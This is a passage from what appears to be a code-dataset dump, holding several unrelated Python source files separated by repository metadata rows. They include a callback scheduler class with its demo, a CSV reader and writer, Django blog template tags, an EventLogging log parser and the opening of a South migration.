    start of the call.  It is possible to yield other values, however, these are
    currently undocumented.

    The call will be made after DELAY seconds.  DELAY must be a floating point value.

    When multiple calls should be, or should have been made, the PRIORITY will decide
    the order at which the calls are made.  Calls with a higher PRIORITY will be
    handled before calls with a lower PRIORITY.  PRIORITY must be an integer.  The
    default PRIORITY is 0.  The order will be undefined for calls with the same
    PRIORITY.

    Each call is identified with an ID_.  A unique numerical identifier will be
    assigned when no ID_ is specified.  Any specified id's must be (unicode)strings.
    Registering multiple calls with the same ID_ is allowed, all calls will be handled
    normally, however, all these calls will be removed if the associated ID_ is
    unregistered.

    Once the call is performed the optional CALLBACK is registered to be called
    immediately.  The first parameter of the CALLBACK will always be either the
    returned value or the raised exception.  If CALLBACK_ARGS is given it will be
    appended to the first argument.  If CALLBACK_KARGS is given it is added to the
    callback as keyword arguments.

    When INCLUDE_ID is True then ID_ or the generated identifier is given as the last
    positional argument to CALL.

    Returns ID_ if specified or a uniquely generated numerical identifier.

    Example:
     > callback.register(my_func, delay=10.0)
     > -> my_func() will be called after 10.0 seconds

    Example:
     > def my_generator():
     >    while True:
     >       print "foo"
     >       yield 1.0
     > callback.register(my_generator)
     > -> my_generator will be called immediately printing "foo", subsequently "foo"
     >    will be printed at 1.0 second intervals
    """
    assert callable(call), "CALL must be callable"
    assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
    assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
    assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
    assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
    assert isinstance(id_, basestring), "ID_ has invalid type: %s" % type(id_)
    assert callback is None or callable(callback), "CALLBACK must be None or callable"
    assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
    assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
    assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
    if __debug__: dprint("register ", call, " after ", delay, " seconds")
    with self._lock:
        if not id_:
            # auto-assign a unique numeric identifier (protected by _lock)
            self._id += 1
            id_ = self._id
        if delay <= 0.0:
            # _expired entries are 6-tuples ordered by priority first:
            # (-priority, timestamp, id_, None, (call, args, kargs), callback)
            heappush(self._expired,
                     (-priority,
                      time(),
                      id_,
                      None,
                      (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                      None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
        else:
            # _requests entries are 5-tuples ordered by deadline first:
            # (deadline, -priority, id_, (call, args, kargs), callback)
            heappush(self._requests,
                     (delay + time(),
                      -priority,
                      id_,
                      (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                      None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
        # wakeup if sleeping
        if not self._event_is_set():
            self._event_set()
        return id_
def persistent_register(self, id_, call, args=(), kargs=None, delay=0.0, priority=0, callback=None, callback_args=(), callback_kargs=None, include_id=False):
    """
    Register CALL to be called only if ID_ has not already been registered.

    Aside from the different behavior of ID_, all parameters behave as in register(...).

    Example:
     > callback.persistent_register("my-id", my_func, ("first",), delay=60.0)
     > callback.persistent_register("my-id", my_func, ("second",))
     > -> my_func("first") will be called after 60 seconds, my_func("second") will not
     >    be called at all

    Example:
     > callback.register(my_func, ("first",), delay=60.0, id_="my-id")
     > callback.persistent_register("my-id", my_func, ("second",))
     > -> my_func("first") will be called after 60 seconds, my_func("second") will not
     >    be called at all
    """
    assert isinstance(id_, basestring), "ID_ has invalid type: %s" % type(id_)
    assert id_, "ID_ may not be an empty (unicode)string"
    assert callable(call), "CALL must be callable"
    assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
    assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
    assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
    assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
    assert callback is None or callable(callback), "CALLBACK must be None or callable"
    assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
    assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
    assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
    if __debug__: dprint("persistent register ", call, " after ", delay, " seconds")
    with self._lock:
        # NOTE(review): the duplicate scan runs over the *live* _requests/_expired
        # lists, while unregister()/replace_register() operate on the mirror
        # lists -- confirm this asymmetry is intended after shutdown.
        for tup in self._requests:
            if tup[2] == id_:
                break
        else:
            # not found in requests
            for tup in self._expired:
                if tup[2] == id_:
                    break
            else:
                # not found in expired; ID_ is free, register the call
                if delay <= 0.0:
                    # immediate: 6-tuple in _expired, ordered by priority
                    heappush(self._expired,
                             (-priority,
                              time(),
                              id_,
                              None,
                              (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                              None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
                else:
                    # delayed: 5-tuple in _requests, ordered by deadline
                    heappush(self._requests,
                             (delay + time(),
                              -priority,
                              id_,
                              (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                              None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
                # wakeup if sleeping
                if not self._event_is_set():
                    self._event_set()
    return id_
def replace_register(self, id_, call, args=(), kargs=None, delay=0.0, priority=0, callback=None, callback_args=(), callback_kargs=None, include_id=False):
    """
    Replace (if present) the currently registered call ID_ with CALL.

    This is a faster way to handle an unregister and register call.  All parameters
    behave as in register(...).
    """
    assert isinstance(id_, (basestring, int)), "ID_ has invalid type: %s" % type(id_)
    assert id_, "ID_ may not be zero or an empty (unicode)string"
    assert callable(call), "CALL must be callable"
    assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
    assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
    assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
    assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
    assert callback is None or callable(callback), "CALLBACK must be None or callable"
    assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
    assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
    assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
    if __debug__: dprint("replace register ", call, " after ", delay, " seconds")
    with self._lock:
        # un-register: blank the payload in-place on the mirror lists; keeping
        # the first heap-key fields unchanged preserves the heap invariant,
        # and _loop skips entries whose call payload is None
        for index, tup in enumerate(self._requests_mirror):
            if tup[2] == id_:
                self._requests_mirror[index] = (tup[0], tup[1], id_, None, None)
                if __debug__: dprint("in _requests: ", id_)
        for index, tup in enumerate(self._expired_mirror):
            if tup[2] == id_:
                self._expired_mirror[index] = (tup[0], tup[1], id_, tup[3], None, None)
                if __debug__: dprint("in _expired: ", id_)
        # register the replacement (same tuple layouts as register(...))
        if delay <= 0.0:
            heappush(self._expired,
                     (-priority,
                      time(),
                      id_,
                      None,
                      (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                      None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
        else:
            heappush(self._requests,
                     (delay + time(),
                      -priority,
                      id_,
                      (call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
                      None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
        # wakeup if sleeping
        if not self._event_is_set():
            self._event_set()
        return id_
def unregister(self, id_):
    """
    Unregister a callback using the ID_ obtained from the register(...) method.

    Every pending or expired entry carrying ID_ has its payload blanked
    in-place; _loop ignores entries whose call payload is None.
    """
    assert isinstance(id_, (basestring, int)), "ID_ has invalid type: %s" % type(id_)
    assert id_, "ID_ may not be zero or an empty (unicode)string"
    if __debug__: dprint(id_)
    with self._lock:
        # operate on the *mirror* lists so removal keeps working even after
        # the loop shut down and replaced the live _requests/_expired lists
        for index, tup in enumerate(self._requests_mirror):
            if tup[2] == id_:
                # 5-tuple layout: (deadline, -priority, id_, call, callback)
                self._requests_mirror[index] = (tup[0], tup[1], id_, None, None)
                if __debug__: dprint("in _requests: ", id_)
        for index, tup in enumerate(self._expired_mirror):
            if tup[2] == id_:
                # 6-tuple layout: (-priority, timestamp, id_, None, call, callback).
                # FIX: preserve the placeholder tup[3] at index 3 (was tup[2],
                # which duplicated the id); matches replace_register's layout.
                self._expired_mirror[index] = (tup[0], tup[1], id_, tup[3], None, None)
                if __debug__: dprint("in _expired: ", id_)
def call(self, call, args=(), kargs=None, delay=0.0, priority=0, id_="", include_id=False, timeout=0.0, default=None):
    """
    Register a blocking CALL to be made, waits for the call to finish, and returns or
    raises the result.

    TIMEOUT gives the maximum amount of time to wait before un-registering CALL.  No
    timeout will occur when TIMEOUT is 0.0.  When a timeout occurs the DEFAULT value
    is returned.  TIMEOUT is unused when called from the same thread.

    DEFAULT can be anything.  The DEFAULT value is returned when a TIMEOUT occurs.
    When DEFAULT is an Exception instance it will be raised instead of returned.

    For the arguments CALL, ARGS, KARGS, DELAY, PRIORITY, ID_, and INCLUDE_ID: see
    the register(...) method.
    """
    assert isinstance(timeout, float)
    assert 0.0 <= timeout
    assert self._thread_ident
    def callback(result):
        # runs on the Callback thread: deposit result and release the waiter
        container[0] = result
        event.set()
    if self._thread_ident == get_ident():
        # already on the Callback thread: call directly to avoid deadlock
        if kargs:
            return call(*args, **kargs)
        else:
            return call(*args)
    else:
        # result container
        container = [default]
        event = Event()
        # register the call
        self.register(call, args, kargs, delay, priority, id_, callback, (), None, include_id)
        # wait for call to finish (or for the timeout to elapse)
        event.wait(None if timeout == 0.0 else timeout)
        # exceptions raised by CALL arrive through the callback and are re-raised
        # here; this also raises DEFAULT when DEFAULT is an Exception instance
        if isinstance(container[0], Exception):
            raise container[0]
        else:
            return container[0]
def start(self, name="Generic-Callback", wait=True):
    """
    Start the asynchronous thread.

    Creates a new daemon thread named NAME and calls the _loop() method on it.
    When WAIT is True, blocks until the thread has left STATE_PLEASE_RUN.
    Returns is_running (i.e. whether the start succeeded).
    """
    assert self._state == "STATE_INIT", "Already (done) running"
    assert isinstance(name, str)
    assert isinstance(wait, bool), "WAIT has invalid type: %s" % type(wait)
    if __debug__: dprint()
    with self._lock:
        self._state = "STATE_PLEASE_RUN"
        if __debug__:
            dprint("STATE_PLEASE_RUN")
            self._debug_thread_name = name
        thread = Thread(target=self._loop, name=name)
        thread.daemon = True
        thread.start()
    if wait:
        # Wait until the thread has started
        while self._state == "STATE_PLEASE_RUN":
            sleep(0.01)
    return self.is_running
def stop(self, timeout=10.0, wait=True, exception=None):
    """
    Stop the asynchronous thread.

    When EXCEPTION is given it is stored as the exit reason before stopping.
    When called with wait=True on the same thread we will return immediately
    (waiting would deadlock).  Returns is_finished.
    """
    assert isinstance(timeout, float)
    assert isinstance(wait, bool)
    if __debug__: dprint()
    if self._state == "STATE_RUNNING":
        with self._lock:
            if exception:
                self._exception = exception
                # NOTE(review): exc_info() reflects the *current* handled
                # exception, which may be unrelated to EXCEPTION -- verify
                self._exception_traceback = exc_info()[2]
            self._state = "STATE_PLEASE_STOP"
            if __debug__: dprint("STATE_PLEASE_STOP")
            # wakeup if sleeping
            self._event.set()
        if wait and not self._thread_ident == get_ident():
            # poll until the loop acknowledges the stop or TIMEOUT elapses
            while self._state == "STATE_PLEASE_STOP" and timeout > 0.0:
                sleep(0.01)
                timeout -= 0.01
            if __debug__:
                if timeout <= 0.0:
                    dprint("timeout. perhaps callback.stop() was called on the same thread?")
    return self.is_finished
def loop(self):
    """
    Use the calling thread for this Callback instance.

    Blocks running _loop() directly instead of spawning a thread (see start()).
    """
    if __debug__: dprint()
    with self._lock:
        self._state = "STATE_PLEASE_RUN"
        if __debug__: dprint("STATE_PLEASE_RUN")
    self._loop()
@attach_profiler
def _loop(self):
    """
    Main scheduler loop: moves due entries from _requests to _expired, runs
    them in priority order, and performs an orderly shutdown on exit.
    """
    if __debug__:
        dprint()
        time_since_expired = 0
    if prctl:
        prctl.set_name("Tribler" + currentThread().getName())
    # put some often used methods and objects in the local namespace
    actual_time = 0
    event_clear = self._event.clear
    event_wait = self._event.wait
    event_is_set = self._event.isSet
    expired = self._expired
    get_timestamp = time
    lock = self._lock
    requests = self._requests
    # record our thread id so is_current_thread / call() can detect re-entry
    self._thread_ident = get_ident()
    with lock:
        if self._state == "STATE_PLEASE_RUN":
            self._state = "STATE_RUNNING"
            if __debug__: dprint("STATE_RUNNING")
    while 1:
        actual_time = get_timestamp()
        with lock:
            # check if we should continue to run
            if self._state != "STATE_RUNNING":
                break
            # move expired requests from REQUESTS to EXPIRED
            while requests and requests[0][0] <= actual_time:
                # notice that the deadline and priority entries are switched, hence, the
                # entries in the EXPIRED list are ordered by priority instead of deadline
                deadline, priority, root_id, call, callback = heappop(requests)
                heappush(expired, (priority, deadline, root_id, None, call, callback))
            if expired:
                if __debug__ and len(expired) > 10:
                    if not time_since_expired:
                        time_since_expired = actual_time
                # we need to handle the next call in line
                priority, deadline, root_id, _, call, callback = heappop(expired)
                wait = 0.0
                if __debug__:
                    self._debug_call_name = self._debug_call_to_string(call)
                # ignore removed tasks (unregister blanks the call payload)
                if call is None:
                    continue
            else:
                # there is nothing to handle; sleep until the next deadline
                # (or 300s as an idle cap)
                wait = requests[0][0] - actual_time if requests else 300.0
                if __debug__:
                    dprint("nothing to handle, wait ", wait, " seconds")
                    if time_since_expired:
                        diff = actual_time - time_since_expired
                        if diff > 1.0:
                            dprint("took ", round(diff, 2), " to process expired queue", level="warning")
                        time_since_expired = 0
            if event_is_set():
                event_clear()
        if wait:
            if __debug__: dprint("%d wait at most %.3fs before next call, still have %d calls in queue" % (time(), wait, len(requests)))
            # woken early by register()/stop() setting the event
            event_wait(wait)
        else:
            if __debug__:
                dprint(self._debug_thread_name, "] calling ", self._debug_call_name, " (prio:", priority, ", id:", root_id, ")")
                debug_call_start = time()
            # call can be either:
            # 1. a generator
            # 2. a (callable, args, kargs) tuple
            try:
                if isinstance(call, TupleType):
                    # callback
                    result = call[0](*call[1], **call[2])
                    if isinstance(result, GeneratorType):
                        # we only received the generator, no actual call has been made to
                        # the function yet, therefore we call it again immediately
                        call = result
                    elif callback:
                        with lock:
                            heappush(expired, (priority, actual_time, root_id, None, (callback[0], (result,) + callback[1], callback[2]), None))
                if isinstance(call, GeneratorType):
                    # start next generator iteration; it must yield a non-negative
                    # float: the delay until its next iteration
                    result = call.next()
                    assert isinstance(result, float), [type(result), call]
                    assert result >= 0.0, [result, call]
                    with lock:
                        heappush(requests, (get_timestamp() + result, priority, root_id, call, callback))
            except StopIteration:
                # generator finished normally; deliver its last result
                if callback:
                    with lock:
                        heappush(expired, (priority, actual_time, root_id, None, (callback[0], (result,) + callback[1], callback[2]), None))
            except (SystemExit, KeyboardInterrupt, GeneratorExit, AssertionError), exception:
                # fatal exceptions terminate the loop
                dprint("attempting proper shutdown", exception=True, level="error")
                with lock:
                    self._state = "STATE_EXCEPTION"
                    self._exception = exception
                    self._exception_traceback = exc_info()[2]
                self._call_exception_handlers(exception, True)
            except Exception, exception:
                # non-fatal: deliver the exception through the callback and, in
                # production (non-debug) builds, keep the loop running
                if callback:
                    with lock:
                        heappush(expired, (priority, actual_time, root_id, None, (callback[0], (exception,) + callback[1], callback[2]), None))
                if __debug__:
                    dprint("__debug__ only shutdown", exception=True, level="error")
                    with lock:
                        self._state = "STATE_EXCEPTION"
                        self._exception = exception
                        self._exception_traceback = exc_info()[2]
                    self._call_exception_handlers(exception, True)
                else:
                    dprint(exception=True, level="error")
                    self._call_exception_handlers(exception, False)
            if __debug__:
                debug_call_duration = time() - debug_call_start
                if debug_call_duration > 1.0:
                    dprint(round(debug_call_duration, 2), "s call to ", self._debug_call_name, level="warning")
    with lock:
        # allowing us to refuse any new tasks. _requests_mirror and _expired_mirror will
        # still allow tasks to be removed
        self._requests = []
        self._expired = []
    # call all expired tasks and send GeneratorExit exceptions to expired generators,
    # note that new tasks will not be accepted
    if __debug__: dprint(self._debug_thread_name, "] there are ", len(expired), " expired tasks")
    while expired:
        _, _, _, _, call, callback = heappop(expired)
        if isinstance(call, TupleType):
            try:
                result = call[0](*call[1], **call[2])
            except:
                dprint(exception=True, level="error")
            else:
                if isinstance(result, GeneratorType):
                    # we only received the generator, no actual call has been made to the
                    # function yet, therefore we call it again immediately
                    call = result
                elif callback:
                    try:
                        callback[0](result, *callback[1], **callback[2])
                    except:
                        dprint(exception=True, level="error")
        if isinstance(call, GeneratorType):
            if __debug__: dprint("raise Shutdown in ", call)
            try:
                call.close()
            except:
                dprint(exception=True, level="error")
    # send GeneratorExit exceptions to scheduled generators
    if __debug__: dprint("there are ", len(requests), " scheduled tasks")
    while requests:
        _, _, _, call, _ = heappop(requests)
        if isinstance(call, GeneratorType):
            if __debug__: dprint("raise Shutdown in ", call)
            try:
                call.close()
            except:
                dprint(exception=True, level="error")
    # set state to finished
    with lock:
        if __debug__: dprint("STATE_FINISHED")
        self._state = "STATE_FINISHED"
if __debug__:
    def main():
        # Exercises the Callback scheduler: plain calls, generators,
        # Switch/Idle yields, (un)register and replace_register.
        c = Callback()
        c.start()
        d = Callback()
        d.start()

        # plain delayed call
        def call1():
            dprint(time())
            sleep(2)
            dprint(time())
        c.register(call1, delay=1.0)
        sleep(2)
        dprint(line=1)

        # generator rescheduled every 1.0s
        def call2():
            delay = 3.0
            for i in range(10):
                dprint(time(), " ", i)
                sleep(delay)
                if delay > 0.0:
                    delay -= 1.0
                yield 1.0
        c.register(call2)
        sleep(11)
        dprint(line=1)

        # generator hopping between the two Callback instances
        def call3():
            delay = 3.0
            for i in range(10):
                dprint(time(), " ", i)
                yield Switch(d)
                # perform code on Callback d
                sleep(delay)
                if delay > 0.0:
                    delay -= 1.0
                yield Switch(c)
                # perform code on Callback c
        c.register(call3)
        sleep(11.0)
        dprint(line=1)

        # CPU intensive call... should 'back off'
        # (defined but never registered in this demo)
        def call4():
            for _ in xrange(10):
                sleep(2.0)
                desync = (yield 1.0)
                dprint("desync... ", desync)
                while desync > 0.1:
                    dprint("backing off... ", desync)
                    desync = (yield desync)
                    dprint("next try... ", desync)
        dprint(line=1)

        # busy vs idle yields
        def call5_bussy():
            for _ in xrange(10):
                desync = yield 0.0
                dprint("on bussy (", desync, ")")
                sleep(0.4)
        def call5_idle():
            for _ in xrange(10):
                desync = yield Idle()
                dprint("on idle (", desync, ")")
        c.register(call5_bussy)
        c.register(call5_idle)
        dprint(line=1)

        def call6():
            dprint("before")
            yield Idle(5.0)
            dprint("after")
        c.register(call6)

        # NOTE(review): indentation reconstructed -- the unregister inside
        # the loop body appears to cancel the task by its own id; confirm
        # against the upstream source.
        def call7():
            dprint("init")
            while True:
                yield 1.0
                dprint("-")
                c.unregister(task_id)
        task_id = c.register(call7)
        c.unregister(task_id)
        sleep(21.0)
        dprint(line=1)

        # register/unregister/replace_register bookkeeping stress test;
        # each container1 slot should end at exactly 2 increments
        def call8(index):
            container1[index] += 1
        def call9(index):
            container2[index] += 1
        def call10():
            indexes = range(len(container1))
            random.shuffle(indexes)
            for index in indexes:
                c.register(call8, (index,))
            for index in indexes:
                c.register(call8, (index,), id_="debug-test-%s" % index)
            for index in xrange(len(container1)):
                c.unregister("debug-test-%s" % index)
            for index in indexes:
                c.register(call8, (index,), delay=60.0, id_="debug-test-2-%s" % index)
            for index in xrange(len(container1)):
                c.unregister("debug-test-2-%s" % index)
            for index in indexes:
                c.register(call8, (index,), id_="debug-test-3-%s" % index)
            for index in xrange(len(container1)):
                c.replace_register("debug-test-3-%s" % index, call9, (index,))
            for index in indexes:
                c.register(call8, (index,), delay=60.0, id_="debug-test-4-%s" % index)
            for index in xrange(len(container1)):
                c.replace_register("debug-test-4-%s" % index, call9, (index,))
            for index in indexes:
                c.register(call8, (index,), delay=1.0)
        import random
        container1 = [0] * 1000
        container2 = [0] * len(container1)
        c.register(call10)
        sleep(10.0)
        assert all(value == 2 for value in container1), container1
        assert all(value == 2 for value in container2), container2

        d.stop()
        c.stop()

if __name__ == "__main__":
    main()
|
UTF-8
|
Python
| false | false | 2,013 |
7,275,674,629,504 |
bce5fb14b76805613c2afbef3ff550298f358499
|
fcf3d18890793500d6c889256da459b8b75a6801
|
/SnakeSQL/external/CSVParser.py
|
5a104af3e1b4b0f5d7e4d237ff067171ef563256
|
[] |
no_license
|
elgamar/snakesql-py2.7
|
https://github.com/elgamar/snakesql-py2.7
|
12a71c37dc18ae8114c3dc2b45eed4894854659b
|
c99eb133e219cc431dbc557bf64b9adc8b4839a1
|
refs/heads/master
| 2016-08-04T14:02:48.351658 | 2013-11-19T21:35:33 | 2013-11-19T21:35:33 | 14,568,859 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"CSV file reader and writer functions. Fully support Excel and other CSV files."
# Imports
from StringParsers import parseCSV, buildCSV
# CSV
def readCSV(filename, separater=',', quote='"', linebreak='\n'):
    """Read *filename* and parse its contents as CSV, returning the rows.

    :param filename: path of the CSV file to read
    :param separater: field separator character
    :param quote: quote character
    :param linebreak: line terminator
    :return: whatever parseCSV produces (a list of rows)
    """
    # 'with' guarantees the file is closed even when read() raises
    with open(filename, 'rb') as fp:
        lines = fp.read()
    return parseCSV(lines, separater, quote, linebreak)
def writeCSV(filename, lines, separater=',', quote='"', linebreak='\n'):
    """Serialize *lines* (a list of rows) to *filename* as CSV.

    :param filename: path of the CSV file to (over)write
    :param lines: rows to serialize via buildCSV
    :param separater: field separator character
    :param quote: quote character
    :param linebreak: line terminator
    """
    # 'with' guarantees the file is closed (and flushed) even when buildCSV raises
    with open(filename, 'wb') as fp:
        fp.write(buildCSV(lines, separater, quote, linebreak))
if __name__ == '__main__':
    # round-trip self-test with values containing quotes, commas and newlines
    csvData = [
        ['Hello','World!', 'D" ",,\n"dsfg,\n,", ,'],
        ['Row 2','World!',"Dod' difficult ' , one to deal,, with"],
    ]
    writeCSV('test.csv', csvData)
    result = readCSV('test.csv')
    if csvData == result:
        print "PASSED: The written and re-read CSV file produces identical objects to the original"
    else:
        print "FAILED: The written and re-read CSV file isn't the same as the original."
        print result
|
UTF-8
|
Python
| false | false | 2,013 |
15,719,580,327,680 |
0eea831f006c7397f53df88650926d1986d98b8a
|
0ba7d7484d1e20ac9c900272e889062ede4e0e7f
|
/dolweb/blog/templatetags/blog_tags.py
|
2bf29f4fa41a44001594decec1ebb2006ba37bc6
|
[
"CC-BY-SA-3.0",
"CC-BY-4.0",
"MIT"
] |
non_permissive
|
Llumex03/www
|
https://github.com/Llumex03/www
|
f5b975eb4e1f6a503419fecd368a11a54a9a9049
|
3fe8538f5a273b4e6bef285b380a507cb9538d3b
|
refs/heads/master
| 2020-02-24T15:52:40.690064 | 2014-05-08T17:31:04 | 2014-05-08T17:31:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.template import Library
register = Library()
from bs4 import BeautifulSoup
from django.conf import settings
from django.template import defaultfilters
from dolweb.blog.models import BlogSerie
@register.inclusion_tag('blog_chunk_series.html')
def get_blog_series(number=5):
    """Return the most recent visible blog series (rendered via blog_chunk_series.html)."""
    return {
        # relies on BlogSerie's default ordering -- presumably newest first; verify
        'series': BlogSerie.objects.filter(visible=True)[:number],
    }
@register.filter
def cuthere_excerpt(content):
    """Return the HTML preceding the <a id="cuthere"> marker in *content*,
    falling back to a 100-word truncation when no marker is present.
    """
    try:
        cut_here = BeautifulSoup(content).find('a', id='cuthere')
        # siblings before the marker's parent come back nearest-first, so
        # reverse them to restore document order before re-serializing
        return ''.join(map(str, reversed(cut_here.parent.find_previous_siblings())))
    except AttributeError:
        # no marker: find() returned None, so .parent raises AttributeError
        return defaultfilters.truncatewords(content, 100)
|
UTF-8
|
Python
| false | false | 2,014 |
13,365,938,256,590 |
a5574a497d9e3e24387418721fd42f970f85617e
|
b900811ab9ff3a375c55b7684a6149137ff38f7e
|
/extensions/EventLogging/server/eventlogging/parse.py
|
b9200cf736a4d1df34dd936c6e9f1e655cfc59d4
|
[
"LicenseRef-scancode-free-unknown",
"GPL-2.0-or-later",
"LGPL-2.0-or-later",
"CC-BY-NC-4.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-generic-exception",
"CC-BY-SA-3.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
legoktm/wikihow-src
|
https://github.com/legoktm/wikihow-src
|
a960d739a65d48b1b037ee05424899bf24556f4c
|
9f86a754d7738eec03fd2c44adc4bea1e09fb1b7
|
refs/heads/master
| 2016-09-05T20:30:42.447182 | 2014-05-25T23:14:52 | 2014-05-26T05:51:26 | 18,299,790 | 4 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
"""
eventlogging.parse
~~~~~~~~~~~~~~~~~~
This module provides a scanf-like parser for raw log lines.
The format specifiers hew closely to those accepted by varnishncsa.
See the `varnishncsa documentation <https://www.varnish-cache.org
/docs/trunk/reference/varnishncsa.html>`_ for details.
Field specifiers
================
+--------+-----------------------------+
| Symbol | Field |
+========+=============================+
| %h | Client IP |
+--------+-----------------------------+
| %j | JSON object |
+--------+-----------------------------+
| %l | Hostname of origin |
+--------+-----------------------------+
| %n | Sequence ID |
+--------+-----------------------------+
| %q | Query-string-encoded JSON |
+--------+-----------------------------+
| %t | Timestamp in NCSA format. |
+--------+-----------------------------+
"""
from __future__ import division, unicode_literals
import calendar
import hashlib
import os
import re
import time
from .compat import json, unquote_plus
__all__ = ('LogParser', 'ncsa_to_epoch', 'ncsa_utcnow')
#: Salt value for hashing IPs. Because this value is generated at
#: runtime, IPs cannot be compared across restarts. This limitation is
#: tolerated because it helps underscore the field's unsuitability for
#: analytic purposes. Client IP is logged solely for detecting and
#: grouping spam coming from a single origin so that it can be filtered
#: out of the logs.
salt = os.urandom(16)
#: Format string (as would be passed to `strftime`) for timestamps in
#: NCSA Common Log Format.
NCSA_FORMAT = '%Y-%m-%dT%H:%M:%S'
def ncsa_to_epoch(ncsa_ts):
    """Convert an NCSA Common Log Format timestamp into seconds since the
    epoch, interpreting the timestamp as UTC.

    :param ncsa_ts: Timestamp in NCSA format.
    """
    parsed = time.strptime(ncsa_ts, NCSA_FORMAT)
    return calendar.timegm(parsed)
def ncsa_utcnow():
    """Return the current UTC date and time in NCSA Common Log Format."""
    now_utc = time.gmtime()
    return time.strftime(NCSA_FORMAT, now_utc)
def hash_value(val):
    """Produces a salted SHA1 hash of any string value.

    :param val: String to hash.
    :return: 40-character hexadecimal digest.
    """
    # named 'digest' rather than 'hash' to avoid shadowing the builtin hash()
    digest = hashlib.sha1(val.encode('utf-8') + salt)
    return digest.hexdigest()
def decode_qson(qson):
    """Decodes a QSON (query-string-encoded JSON) object.

    :param qson: Query-string-encoded JSON, optionally wrapped in leading
        '?' / trailing ';' characters (stripped before decoding).
    """
    return json.loads(unquote_plus(qson.strip('?;')))
#: A mapping of format specifiers to a tuple of (regexp, caster).
#: The regexp supplies the named capture group; the caster converts the
#: captured string into its final value (see LogParser._repl / parse).
format_specifiers = {
    '%h': (r'(?P<clientIp>\S+)', hash_value),
    '%j': (r'(?P<capsule>\S+)', json.loads),
    '%l': (r'(?P<recvFrom>\S+)', str),
    '%n': (r'(?P<seqId>\d+)', int),
    '%q': (r'(?P<capsule>\?\S+)', decode_qson),
    '%t': (r'(?P<timestamp>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})',
           ncsa_to_epoch),
}
class LogParser(object):
    """Parses raw varnish/MediaWiki log lines into encapsulated events."""

    def __init__(self, format):
        """Constructor.

        :param format: Format string (e.g. ``"%n %l %t %h %q"``).
        """
        self.format = format
        #: Field casters, ordered by the relevant field's position in
        #: format string (filled in by _repl during the re.sub below).
        self.casters = []
        #: Compiled regexp; each specifier is replaced by a named group,
        #: '%%'-escaped specifiers are left alone via the (?<!%) lookbehind.
        self.re = re.compile(re.sub(r'(?<!%)%[hjlnqt]', self._repl, format))

    def _repl(self, spec):
        """Replace a format specifier with its expanded regexp matcher
        and append its caster to the list.  Called by :func:`re.sub`.
        """
        matcher, caster = format_specifiers[spec.group()]
        self.casters.append(caster)
        return matcher

    def parse(self, line):
        """Parse a log line into a map of field names / values.

        :raises ValueError: when *line* does not match the format.
        """
        match = self.re.match(line)
        if match is None:
            raise ValueError(self.re, line)
        # order group names by their match position so they pair up with
        # self.casters, which were appended in format-string order
        keys = sorted(match.groupdict(), key=match.start)
        event = {k: f(match.group(k)) for f, k in zip(self.casters, keys)}
        # the %j/%q 'capsule' decodes to a dict; merge it into the event
        event.update(event.pop('capsule'))
        return event

    def __repr__(self):
        return '<LogParser(\'%s\')>' % self.format
|
UTF-8
|
Python
| false | false | 2,014 |
3,049,426,782,029 |
1d7a3075794abe19d23432baf8c02fd70ab5dc45
|
246fabdd0ede2bc44c8f90ef942c2e3a1698cfb7
|
/news21national/core/migrations/0002_extend_profile.py
|
224e9a3347d12bee652b2152e78907a349f87b4a
|
[] |
no_license
|
news21/news21-national
|
https://github.com/news21/news21-national
|
43ece7316f1681e8f051643f1d1871be41ff5e01
|
191318ced4150943d14bfedca31252d63f30bca2
|
refs/heads/master
| 2016-09-05T14:01:44.428627 | 2011-06-10T21:32:08 | 2011-06-10T21:32:08 | 494,375 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from south.db import db
from django.db import models
from news21national.core.models import *
class Migration:
def forwards(self, orm):
    """Apply the migration: create the UserSkills, Skill and
